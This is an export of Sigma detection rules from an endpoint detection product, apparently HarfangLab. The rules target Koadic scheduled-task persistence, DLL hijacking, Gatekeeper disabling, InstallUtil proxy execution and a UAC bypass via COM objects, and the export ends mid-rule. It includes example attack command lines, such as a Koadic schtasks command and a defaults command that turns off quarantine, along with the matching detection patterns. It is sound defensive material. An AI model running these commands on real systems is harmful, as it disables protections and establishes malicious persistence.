"rule_description": "Detects a platform binary being executed from an uncommon folder.\nApple's signed binaries, also known as platform binaries, should only be executed from system directories.\nAdversaries may copy and execute such binaries in another folder in order to bypass security solutions.\nIt is recommended to analyze the process that copied the binary as well as commands that were executed.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2026-03-23",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5afe7952-8754-4b6d-9df2-bb59a0b2feea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077237Z",
"creation_date": "2026-03-23T11:45:34.077239Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077244Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1053_005_koadic_scheduled_task.yml",
"content": "title: Scheduled Task Created by Koadic\nid: 5afe7952-8754-4b6d-9df2-bb59a0b2feea\ndescription: |\n Detects the creation of a suspicious task used to reconnect a system infected by Koadic back to its command-and-control (C2) server.\n Koadic is a remote access Trojan (RAT) that enables attackers to maintain persistence and control over an infected system.\n The creation of such a task indicates an attempt to establish communication with the C2 server, potentially for data exfiltration or further malicious activities.\n It is recommended to investigate the task's properties, check for any unusual or unauthorized scheduled tasks, and scan the system for the presence of Koadic or other indicators of infection.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/02/11\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Koadic\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # schtasks.exe /create /tn K0adic /tr \"C:\\Windows\\system32\\mshta.exe \" /sc onlogon /ru System /f\n # schtasks.exe /create /tn K0adic /tr \"C:\\Windows\\system32\\mshta.exe \" /sc onidle /i 1 /f\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.EXE'\n\n selection_cmd:\n CommandLine|contains|all:\n - '/create '\n - '/tn K0adic '\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5afe7952-8754-4b6d-9df2-bb59a0b2feea",
"rule_name": "Scheduled Task Created by Koadic",
"rule_description": "Detects the creation of a suspicious task used to reconnect a system infected by Koadic back to its command-and-control (C2) server.\nKoadic is a remote access Trojan (RAT) that enables attackers to maintain persistence and control over an infected system.\nThe creation of such a task indicates an attempt to establish communication with the C2 server, potentially for data exfiltration or further malicious activities.\nIt is recommended to investigate the task's properties, check for any unusual or unauthorized scheduled tasks, and scan the system for the presence of Koadic or other indicators of infection.\n",
"rule_creation_date": "2021-02-11",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b03b3fc-3d9b-465b-811a-bc049224fc59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098135Z",
"creation_date": "2026-03-23T11:45:34.098137Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098142Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_windowsactiondialog.yml",
"content": "title: DLL Hijacking via WindowsActionDialog.exe\nid: 5b03b3fc-3d9b-465b-811a-bc049224fc59\ndescription: |\n Detects potential Windows DLL Hijacking via WindowsActionDialog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WindowsActionDialog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b03b3fc-3d9b-465b-811a-bc049224fc59",
"rule_name": "DLL Hijacking via WindowsActionDialog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WindowsActionDialog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b20f331-5f45-4510-a0f2-7116fa857515",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598305Z",
"creation_date": "2026-03-23T11:45:34.598311Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598323Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_gatekeeper_disbaled_globally_defaults.yml",
"content": "title: Gatekeeper Disabled via defaults\nid: 5b20f331-5f45-4510-a0f2-7116fa857515\ndescription: |\n Detects the execution of the defaults command to disable Gatekeeper on macOS.\n Gatekeeper is a security feature of macOS that enforces code signing and verifies downloaded applications before allowing them to run.\n Attackers may disable Gatekeeper to allow untrusted applications to run on the system.\n It is recommended to check the execution context of defaults to look for suspicious processes.\nreferences:\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.ImpairDefenses\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/defaults'\n CommandLine|contains:\n - ' write com.apple.LaunchServices LSQuarantine -bool NO'\n - ' write com.apple.LaunchServices LSQuarantine false'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b20f331-5f45-4510-a0f2-7116fa857515",
"rule_name": "Gatekeeper Disabled via defaults",
"rule_description": "Detects the execution of the defaults command to disable Gatekeeper on macOS.\nGatekeeper is a security feature of macOS that enforces code signing and verifies downloaded applications before allowing them to run.\nAttackers may disable Gatekeeper to allow untrusted applications to run on the system.\nIt is recommended to check the execution context of defaults to look for suspicious processes.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b3797e1-49d8-453d-aa91-119bf4574c17",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591091Z",
"creation_date": "2026-03-23T11:45:34.591095Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591102Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_waitfor.yml",
"content": "title: DLL Hijacking via waitfor.exe\nid: 5b3797e1-49d8-453d-aa91-119bf4574c17\ndescription: |\n Detects potential Windows DLL Hijacking via waitfor.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'waitfor.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b3797e1-49d8-453d-aa91-119bf4574c17",
"rule_name": "DLL Hijacking via waitfor.exe",
"rule_description": "Detects potential Windows DLL Hijacking via waitfor.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b48cbef-ef63-4129-ad19-8865b975a9a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071024Z",
"creation_date": "2026-03-23T11:45:34.071026Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071030Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Installutil/",
"https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/",
"https://attack.mitre.org/techniques/T1218/004/"
],
"name": "t1218_004_installutil_suspicious_execution.yml",
"content": "title: Suspicious Proxy Execution via InstallUtil\nid: 5b48cbef-ef63-4129-ad19-8865b975a9a2\ndescription: |\n Detects the suspicious usage of InstallUtil which is a Microsoft binary used for installing and uninstalling server resources.\n This utility is part of the .NET Framework and can be used to run any .NET executables.\n Attackers may abuse this binary to bypass security restrictions.\n It is recommended to verify the legitimacy of the executable launched by InstallUtil.\n The parent process can also be a good indicator about the InstallUtil's execution context, such as the result of a legitimate software installation.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Installutil/\n - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/\n - https://attack.mitre.org/techniques/T1218/004/\ndate: 2023/04/04\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.InstallUtil\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'InstallUtil.exe'\n CommandLine|contains|all:\n - '/logfile= '\n - '/LogToConsole=false'\n\n exclusion_programfiles:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_msiexec:\n CommandLine|endswith:\n - ' ?:\\Program Files\\Microsoft System Center\\Virtual Machine Manager\\bin\\Microsoft.SystemCenter.VirtualMachineManager.dll'\n - ' ?:\\Program Files\\Citrix\\Virtual Desktop Agent\\upmWmiMetrics.dll /logfile= /LogToConsole=FALSE'\n - ' ?:\\Program Files\\Citrix\\Virtual Desktop Agent\\upmWmiAdmin.dll /logfile= /LogToConsole=FALSE'\n - ' ?:\\Program Files\\Citrix\\User Profile Manager\\ISessionMetrics.exe /logfile= 
/LogToConsole=FALSE'\n - ' /Uninstall /LogFile= /LogToConsole=true /ShowCallStack ?:\\Program Files\\Citrix\\CdfCaptureService\\CdfCaptureService.exe'\n ParentImage: '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_devexpress:\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 20.1\\Components /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 20.1\\Components /Version=20.1.7 /Component=XPOWizard /DemosName= /VSVersions=VS110;VS120;VS140;VS150;VS160; C:\\Program Files (x86)\\DevExpress 20.1\\Components\\System\\XPOWizard\\DevExpress.Xpo.v20.1.Installer.dll\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 20.2\\Components /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 20.2\\Components /Version=20.2.12 /Component=XtraReportsCommon /DemosName= /VSVersions=VS110;VS120;VS140;VS150;VS160; C:\\Program Files (x86)\\DevExpress 20.2\\Components\\System\\XtraReportsCommon\\DevExpress.XtraReports.v20.2.Installer.dll\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 20.2\\Components /DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 20.2\\Components /Version=20.2.12 /Component=DevExpressMenu /DemosName= /VSVersions=VS110;VS120;VS140;VS150;VS160; C:\\Program Files (x86)\\DevExpress 20.2\\Components\\System\\DevExpressMenu\\Bin\\DevExpress.Menu.Installer.dll\n # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir=C:\\Program Files (x86)\\DevExpress 17.2\\DevExtreme 
/DemosDir=C:\\Users\\Public\\Documents\\DevExpress Demos 17.2\\DevExtreme /Version=17.2.5 /Component=DevExtreme HTML JS /DemosName=HTML JS /VSVersions=VS100;VS110;VS120;VS140;VS150; C:\\Program Files (x86)\\DevExpress 17.2\\DevExtreme\\System\\DevExtreme HTML JS\\DXTreme.VsixInstaller.dll\n CommandLine|contains|all:\n - 'InstallUtil.exe /InstallType=NoTransaction /Action=Install /LogToConsole=true /LogFile= /ShowCallStack /InstallDir='\n - '/DemosDir='\n - '/Component='\n - '/DemosName='\n - '\\DevExpress '\n\n exclusion_mysql:\n CommandLine|startswith:\n - '?:\\WINDOWS\\Microsoft.NET\\Framework\\v*\\installUtil.exe /LogToConsole=false * ?:\\Program Files (x86)\\MySQL\\MySQL Connector Net *\\'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installUtil.exe /LogToConsole=false * ?:\\Program Files (x86)\\MySQL\\Connector.NET *\\'\n\n exclusion_kofax:\n CommandLine|startswith: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\InstallUtil.exe * ?:\\Program Files (x86)\\Kofax\\Capture\\Bin\\'\n\n exclusion_kardex:\n CommandLine|startswith: '?:\\Program Files (x86)\\KARDEX\\Kardex Power Pick System\\InstallUtil.exe /LogToConsole=false /LogFile= '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b48cbef-ef63-4129-ad19-8865b975a9a2",
"rule_name": "Suspicious Proxy Execution via InstallUtil",
"rule_description": "Detects the suspicious usage of InstallUtil, a Microsoft binary shipped with the .NET Framework that is used to install and uninstall server resources.\nBecause it executes the installer components contained in a .NET assembly, attackers can abuse it as a proxy to run attacker-controlled managed code under the cover of a trusted binary and bypass application whitelisting restrictions.\nThis rule keys on the '/logfile= /LogToConsole=false' argument pattern commonly documented for this bypass and suppresses known legitimate installers.\nIt is recommended to verify the legitimacy of the assembly launched by InstallUtil (path, signature and origin).\nThe parent process is also a good indicator of InstallUtil's execution context, such as being spawned by msiexec.exe as part of a legitimate software installation.\n",
"rule_creation_date": "2023-04-04",
"rule_modified_date": "2025-04-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b70e3f8-bc77-44f7-a1df-f5f015e6ad03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077767Z",
"creation_date": "2026-03-23T11:45:34.077769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077773Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gist.github.com/hfiref0x/a044cb0ad425488e38556408b179cb61",
"https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_icmluautil.yml",
"content": "title: UAC Bypass Executed via ICMLuaUtil\nid: 5b70e3f8-bc77-44f7-a1df-f5f015e6ad03\ndescription: |\n Detects attempts to bypass the UAC via the ICMLuaUtil COM interface.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate surrounding alerts and to correlate them with actions performed by the DLLHost process to determine whether this action is legitimate.\nreferences:\n - https://gist.github.com/hfiref0x/a044cb0ad425488e38556408b179cb61\n - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\n - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/12/03\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1218.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|endswith:\n # CMSTPLUA\n - '\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\n # CMLUAUTIL\n - '\\DllHost.exe /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}'\n # ColorDataProxy\n - '\\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_wireguard:\n Image: '?:\\Program Files\\WireGuard\\wireguard.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b70e3f8-bc77-44f7-a1df-f5f015e6ad03",
"rule_name": "UAC Bypass Executed via ICMLuaUtil",
"rule_description": "Detects attempts to bypass the UAC via auto-elevated COM objects such as the ICMLuaUtil interface (CMSTPLUA / CMLUAUTIL) or ColorDataProxy, by looking for processes spawned by a DllHost.exe COM surrogate hosting one of these CLSIDs.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate surrounding alerts, to identify which process instantiated the elevated COM object, and to correlate them with the actions performed by the DllHost process and its child process to determine whether this action is legitimate.\n",
"rule_creation_date": "2020-12-03",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1218.003",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b9d91f9-ee6e-4bf2-879a-920f4bf62aca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590815Z",
"creation_date": "2026-03-23T11:45:34.590819Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590826Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_graphics_check.yml",
"content": "title: DLL Hijacking via graphics-check.exe\nid: 5b9d91f9-ee6e-4bf2-879a-920f4bf62aca\ndescription: |\n Detects potential Windows DLL Hijacking via graphics-check.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 